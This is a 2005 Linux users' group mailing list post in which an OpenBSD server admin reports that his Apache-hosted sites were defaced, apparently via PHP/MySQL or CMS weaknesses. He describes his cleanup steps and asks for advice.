David Kaplowitz on 17 Jan 2005 05:45:45 -0000 |
Well I noticed tonight that one of my web sites got defaced. I was rather chagrined as this is the first time I've been hacked after running public services for over 2 years. Upon closer inspection I noticed that every virtual host in my httpd.conf's index.html (about 8-9 sites) had been replaced by a lame index page by some Albanian political script kiddies. Although I've yet to find the smoking gun in my log files, I'm 99% positive they exploited weaknesses in my configuration (or lack thereof) of PHP/MySQL (and a few popular CMSes, TikiWiki and Wordpress). I'd noticed some problems a couple of weeks ago with my MySQL when I received a spam attack on my Wordpress blog, when I tried logging into the DB, I wasn't able to authenticate and assumed there was a configuration issue. Unfortunately I kept procrastinating looking further into it, which may have been my demise. So much for slacking on fixing problems. I'm running Apache 1.3.29 on OpenBSD 3.6-STABLE, (note 1.3.29 is OpenBSD's security patched Apache, they actually don't recommend using 1.3.33 from apache.org for both licensing and security reasons), PHP 4.3.8 and MySQL 4.0.20...all in a chroot'ed environment. I've run chkrootkit on the box and nothing comes up, none of the authlog/secure logs look odd. The modded index.htmls are dated with yesterday's date. My apache logs weren't revealing much that was readily apparent, but I did notice a lot of odd stuff related to what appeared to be scripts trying undeclared variables against the server. I've yet to look into it deeper. I've disable all public services on the box, and presently tarring up all the partitions and am going to reinstall, this time I'm not going to even install PHP or MySQL until I can get to the bottom of the exploit. I'd feel confident running a base Apache on OpenBSD again. Anyway, can any of you recommend any further actions to take on this first invasion? I'm sure I missed some things. But I'm pretty convinced that it's very unwise to be lazy when you're running the PHP/MySQL combo on a public server, esp. with some of these CMSes that are popular. Thanks in advance for any input. And sorry it's not ___________________________________________________________________________ Philadelphia Linux Users Group -- http://www.phillylinux.org Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce General Discussion -- http://lists.phillylinux.org/mailman/listinfo/plug
|
|